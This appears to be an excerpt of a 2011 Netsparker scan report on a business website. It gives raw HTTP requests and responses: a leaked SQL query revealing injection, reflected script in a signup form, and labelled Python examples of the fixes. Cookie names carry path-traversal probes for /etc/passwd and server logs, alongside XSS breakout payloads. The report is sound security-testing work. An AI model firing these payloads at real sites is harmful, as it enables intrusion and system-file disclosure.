OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:13 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=eecljvkm6b2sjqupdk3u0i1fr7; path=/
Content-Length: 2963
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/?'"--></style></script><script>netsparker(0x000599)</script>' OR prj.project_page_url = 'leadflow/lgds00/?'"--></style></script><script>netsparker(0x000599)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/?'"--></style></script><script>netsparker(0x000599)</script>' OR prj.project_page_url = 'leadflow/lgds00/?'"--></style></script><script>netsparker(0x000599)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/?'"--></style></script><script>netsparker(0x000599)</script>' OR prj.project_page_url = 'leadflow/lgds00/?'"--></style></script><script>netsparker(0x000599)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 
'leadflow/lgds00/?'"--></style></script><script>netsparker(0x000599)</script>' OR prj.project_page_url = 'leadflow/lgds00/?'"--></style></script><script>netsparker(0x000599)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/?'"--></style></script><script>netsparker(0x000599)</script>' OR prj.project_page_url = 'leadflow/lgds00/?'"--></style></script><script>netsparker(0x000599)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x000599)</script>/' union select prj.catI' at line 5
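Added example, not part of the Netsparker report or of the insideup.com code. The MySQL error in the response above shows that the request URI after /ppc/, query string included, is spliced into quoted string literals in the WHERE clause (once as-is, once with a trailing slash), so the scanner's '"--> probe breaks the statement and the server returns the failed SQL with a 200. The block below reproduces that construction against an in-memory SQLite table and shows the parameterised form of the same lookup. The table schema is assumed (only the columns and one table name visible in the error text are used), the seeded row is constructed, and the function names are mine.

```python
import sqlite3

# Constructed from the request above: the URL-decoded probe Netsparker put in the query string.
PROBE = "'\"--></style></script><script>netsparker(0x000599)</script>"
PROBE_URI = "/ppc/leadflow/lgds00/?" + PROBE

# Assumed schema: only the columns and one table name visible in the error text are used.
SELECT = ("select catId, groupId, templateId, project_page_url "
          "from lead_flow_one_pages_details prj ")


def make_db():
    """In-memory stand-in for the lead-flow table, seeded with one constructed page row."""
    db = sqlite3.connect(":memory:")
    db.execute("create table lead_flow_one_pages_details "
               "(catId integer, groupId integer, templateId integer, project_page_url text)")
    db.execute("insert into lead_flow_one_pages_details values (80005, 1, 1, 'leadflow/lgds00/')")
    db.commit()
    return db


def page_key(request_uri):
    """What the error text shows being compared: the URI after '/ppc/', query string included."""
    prefix = "/ppc/"
    return request_uri[len(prefix):] if request_uri.startswith(prefix) else request_uri


def lookup_vulnerable(db, request_uri):
    """The pattern the error reveals: the key is pasted into quoted literals by concatenation."""
    key = page_key(request_uri)
    sql = (SELECT + "where prj.project_page_url = '" + key + "' "
           "OR prj.project_page_url = '" + key + "/'")
    return db.execute(sql).fetchall()


def lookup_parameterised(db, request_uri):
    """Fix: bind the key as a parameter, so quotes in the input are data rather than syntax."""
    key = page_key(request_uri)
    sql = SELECT + "where prj.project_page_url = ? OR prj.project_page_url = ?"
    return db.execute(sql, (key, key + "/")).fetchall()


def probe_breaks_query(db, request_uri):
    """True when the concatenated statement no longer parses, which is what the response leaked."""
    try:
        lookup_vulnerable(db, request_uri)
    except sqlite3.OperationalError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, "/ppc/leadflow/lgds00/"))  # [(80005, 1, 1, 'leadflow/lgds00/')]
    print(probe_breaks_query(db, PROBE_URI))                # True: syntax error, as in the report
    print(lookup_parameterised(db, PROBE_URI))              # []: the probe is just an unmatched string
```

SQLite tokenises the probe differently from MySQL (it treats a bare -- as a comment start and "..." as an identifier, whereas MySQL needs whitespace after -- and reads "..." as a string), so the error text differs from the one in the response, but the concatenated statement fails to parse in both engines while the bound version simply finds no row. The query string has no business being part of the page key at all; binding the parameter is the fix regardless of how the key is derived.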
- /communitysignup.html

/communitysignup.html CONFIRMED

http://www.insideup.com/communitysignup.html

Parameters

Parameter Type Value
companyName POST Smith
emailAddress POST netsparker@example.com
firstName POST Smith
lastName POST Smith
password1 POST 3
password2 POST 3
pseudonym POST 3
receiveSpecialOfferEmail POST netsparker@example.com
refererUrl POST '"--></style></script><script>alert(0x0005A3)</script>
termsOfService POST 3

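Added example, not from the report or from the site. The response that follows writes the POSTed refererUrl value verbatim into the value attribute of the hidden refererUrl input on the signup page (the same sink the other /communitysignup.html findings listed above rely on), so a value containing a closing double quote and > terminates the attribute and the tag, after which the browser parses the remainder as markup. The block below reproduces that rendering in Python, then the attribute-escaped form, and uses the standard library HTML parser to check which tags each version actually produces. The site itself runs on a Java servlet container, judging by JSESSIONID, so this is an illustration of the pattern rather than its code; the function names are mine.

```python
from html import escape
from html.parser import HTMLParser

# Constructed from the request below: the URL-decoded refererUrl value Netsparker posted.
PAYLOAD = "'\"--></style></script><script>netsparker(0x0005A3)</script>"


def hidden_input_vulnerable(referer_url):
    """What the response shows: the posted value is concatenated straight into the attribute."""
    return '<input type="hidden" name="refererUrl" value="' + referer_url + '">'


def hidden_input_escaped(referer_url):
    """Fix for an attribute context: escape <, >, & and, with quote=True, both quote characters."""
    return ('<input type="hidden" name="refererUrl" value="'
            + escape(referer_url, quote=True) + '">')


class TagCollector(HTMLParser):
    """Records every start tag and the refererUrl value a browser-like parser would see."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.referer_value = None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        attrs = dict(attrs)
        if tag == "input" and attrs.get("name") == "refererUrl":
            self.referer_value = attrs.get("value")


def parse(markup):
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector


def script_injected(markup):
    """True when the rendered fragment yields a <script> start tag of its own."""
    return "script" in parse(markup).tags


def round_trips(markup, original):
    """True when the parser hands the form exactly the value that was submitted."""
    return parse(markup).referer_value == original


if __name__ == "__main__":
    print(script_injected(hidden_input_vulnerable(PAYLOAD)))   # True: attribute closed, script tag live
    print(script_injected(hidden_input_escaped(PAYLOAD)))      # False: one input tag only
    print(round_trips(hidden_input_escaped(PAYLOAD), PAYLOAD))  # True: value preserved as data
```

The escaped version keeps the submitted string intact as data (the parser unescapes it back to the original when reading the attribute) while producing no tag other than the input itself. Escaping has to match the context the value lands in; this sink is a double-quoted attribute, so an escape that leaves quotes alone would not be enough.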
Request

POST /communitysignup.html HTTP/1.1
Referer: http://www.insideup.com/communitysignup.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 286
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

companyName=Smith&emailAddress=netsparker%40example.com&firstName=Smith&lastName=Smith&password1=3&password2=3&pseudonym=3&receiveSpecialOfferEmail=netsparker%40example.com&refererUrl='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0005A3)%3c%2fscript%3e&termsOfService=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:19 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=E02CEFC241169631815239EB57FE4867; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content="InsideUp, business, wiki, advertise, business category, vendors, ratings, business service, technology, leads, community, social networking, referral, reference, share, San Diego, commerce, b2b, trade, industry, selling, production, big business, dealing, corporation, conglomerate, establishment, partnership, firm, multinational, transnational, small business, enterprise, venture, organization, transaction, contract, commercial, occupational, corporate, publicize, market, search, forum, forums, discuss, share, information"/> <meta name="description" content="Join your community and share your services!"/> <meta name="robots" content="index; follow"/> <title>Share your services and experiences with your community.</title> <link rel="stylesheet" type="text/css" href="/css/mainNewInsideup.css" />
<link rel="stylesheet" type="text/css" href="/css/calendar.css" /> <script type="text/javascript" src="/js/jquery-1.2.1.js"></script> <script type="text/javascript" src="/js/ajax.js"></script> <script type="text/javascript" src="/js/ajax-dynamic-list.js"></script> <script type="text/javascript" src="/js/default.js"></script> <script type="text/javascript" src="/js/calendar.js" ></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {} </script></head><body> <div id="mainContainer">
<!--Header Start's Here--> <div class="header"> <!---put header section here--> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> 
<option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." 
>Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value="'"--></style></script><script>netsparker(0x0005A3)</script>"> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" 
src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('Community Signup',0,'')" alt="Home" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerHomeActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <!--Header End's Here--> <!--Mid Container Start's Here--> <div id="midSectionBox"> <!--midsection part starts--> <script type="text/javascript"> function invertValue(y){ var x=document.getElementById(y).value if(x==0) { document.getElementById(y).value=1 } if(x==1) { 
document.getElementById(y).value=0 }}</script><div style="background:url(/images/midSliceMain.gif);"> <div style="width:850px; height:740px; margin:auto; padding-top:20px;"> <!-----left Section--------> <div style="width:530px; height:auto; float:left;"> <div id="communityLogin"> <div style="width:492px; height:84px; border:1px solid #eeeeee;"> <form method="post" id="communityLoginId"> <input type="hidden" name="refererUrl" value="'"--></style></script><script>netsparker(0x0005A3)</script>"> <table width="96%" border="0" align="right" cellpadding="0" cellspacing="0"> <tr> <td width="27%" height="70" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777;">Already A Member?</td> <td width="53%" valign="bottom" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777; padding-top:22px;">&nbsp; <input name="username" value="username" type="text" onclick="clearInput(this);" onfocus="clearInput(this);" id="textfield" style="width:110px; padding:3px 0 0 3px; height:20px; border:1px solid #cccccc; margin-left:5px;" onkeypress="checkEnterKey(event)" /> <input type="password" name="password" id="textfield" style="width:110px; height:22px; border:1px solid #cccccc; padding:3px 0 0 3px; height:20px; margin-left:5px;" value="password" onclick="clearInput(this);" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" /> <span style="padding-left: 10px; line-height: 12px;"> <input type="hidden" name="_rememberme"> <input type="checkbox" name="rememberme" id="checkbox" value="true" /> <span style="color:#777777;font-size:10px;font-weight:bold;text-decoration:none;">Remember Me</span> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </span> </td> <td width="22%" style="padding-top:6px;">&nbsp; <a href="javascript:void(0);" onclick="javascript:submitCommunityLogin();checkScreenWidth();"><img src="images/ComunityLogin.png" border="0" alt="Login"/></a> </td> </tr> </table> </form> </div> </div> 
<form method="post" action="communitysignup.html"> <input type="hidden" name="refererUrl" value='&#039;&#034;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x0005A3)&lt;/script&gt;'/> <div> <table width="496" border="0" cellspacing="0" cellpadding="0" style="margin-top:20px;"> <tr> <td colspan="2" style="font:bold 22px Arial, Helvetica, sans-serif; color:#181818;">Create Your Free Account</td> </tr> <tr> <td height="24" colspan="2" style="font:normal 12px Arial, Helvetica, sans-serif; color:#181818;">To gain free access to the InsideUp community please complete this short registration.</td> </tr> <tr> <td width="131" height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Username <span style="color:#dc0000">*</span></td> <td width="365"> <input type="text" name="pseudonym" value="3" id="pseudonym" style="width:280px; height:18px; padding-top:3px; margin-left:10px;" class="inputbox123 " /> </td> </tr> <tr> <td height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Email <span style="color:#dc0000">*</span></td> <..
- /ppc/leadflow/lgds00/project.php

/ppc/leadflow/lgds00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/lgds00/project.php?catId=80005&iusrc=iupsc&nsextt='%22--%3E%3C/..

Parameters

Parameter Type Value
catId GET 80005
iusrc GET iupsc
nsextt GET '"--></style></script><script>alert(0x0005A5)</script>

Request

GET /ppc/leadflow/lgds00/project.php?catId=80005&iusrc=iupsc&nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005A5)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 